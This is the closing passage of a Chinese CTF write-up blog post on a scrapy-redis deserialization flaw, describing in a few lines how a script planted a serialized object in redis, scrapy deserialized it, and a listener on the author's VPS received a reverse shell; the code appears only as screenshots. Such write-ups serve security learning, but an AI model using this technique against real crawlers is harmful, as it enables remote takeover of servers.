<p>此时redis中key为空<br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698420568-65844263-4b06-48ad-8536-a6feca89b40f.png#align=left&amp;display=inline&amp;height=85&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=170&amp;originWidth=386&amp;size=19856&amp;status=done&amp;style=none&amp;width=193" alt="image.png"><br>vps上监听端口，随后运行脚本<br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698447710-40875615-c803-41d8-bdfe-3fb4533b7d26.png#align=left&amp;display=inline&amp;height=114&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=228&amp;originWidth=816&amp;size=15287&amp;status=done&amp;style=none&amp;width=408" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698465447-11806513-e268-4726-8eb3-cc12656b7afd.png#align=left&amp;display=inline&amp;height=105&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=210&amp;originWidth=706&amp;size=36095&amp;status=done&amp;style=none&amp;width=353" alt="image.png"><br>此时scrapy获取了该对象并反序列化<br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698500314-d14052e5-e3d7-45c9-acbc-157633df01c7.png#align=left&amp;display=inline&amp;height=970&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=1940&amp;originWidth=3360&amp;size=678315&amp;status=done&amp;style=none&amp;width=1680" alt="image.png"><br>vps中获取到shell<br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698520868-09d2123d-0a2a-460a-af98-bed3dff64f21.png#align=left&amp;display=inline&amp;height=307&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=614&amp;originWidth=1148&amp;size=86859&amp;status=done&amp;style=none&amp;width=574" alt="image.png"></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/other">友链</a></li>
         
          <li><a href="https://github.com/suanve?tab=repositories" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1、前言"><span class="toc-number">1.</span> <span class="toc-text">1、前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2、配置环境"><span class="toc-number">2.</span> <span class="toc-text">2、配置环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#a-创建scrapy项目"><span class="toc-number">2.1.</span> <span class="toc-text">a.创建scrapy项目</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b-配置redis与mongodb"><span class="toc-number">2.2.</span> <span class="toc-text">b.配置redis与mongodb</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#c-修改scrapy"><span class="toc-number">2.3.</span> <span class="toc-text">c.修改scrapy</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3、漏洞利用"><span class="toc-number">3.</span> <span class="toc-text">3、漏洞利用</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://xiaokou.top/posts/20216f54/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://xiaokou.top/posts/20216f54/&text=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://xiaokou.top/posts/20216f54/&is_video=false&description=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=从bytectf学到的scrapy-redis反序列化漏洞&body=Check out this article: https://xiaokou.top/posts/20216f54/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://xiaokou.top/posts/20216f54/&name=从bytectf学到的scrapy-redis反序列化漏洞&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://xiaokou.top/posts/20216f54/&t=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    suanve
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/other">友链</a></li>
         
          <li><a href="https://github.com/suanve?tab=repositories" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
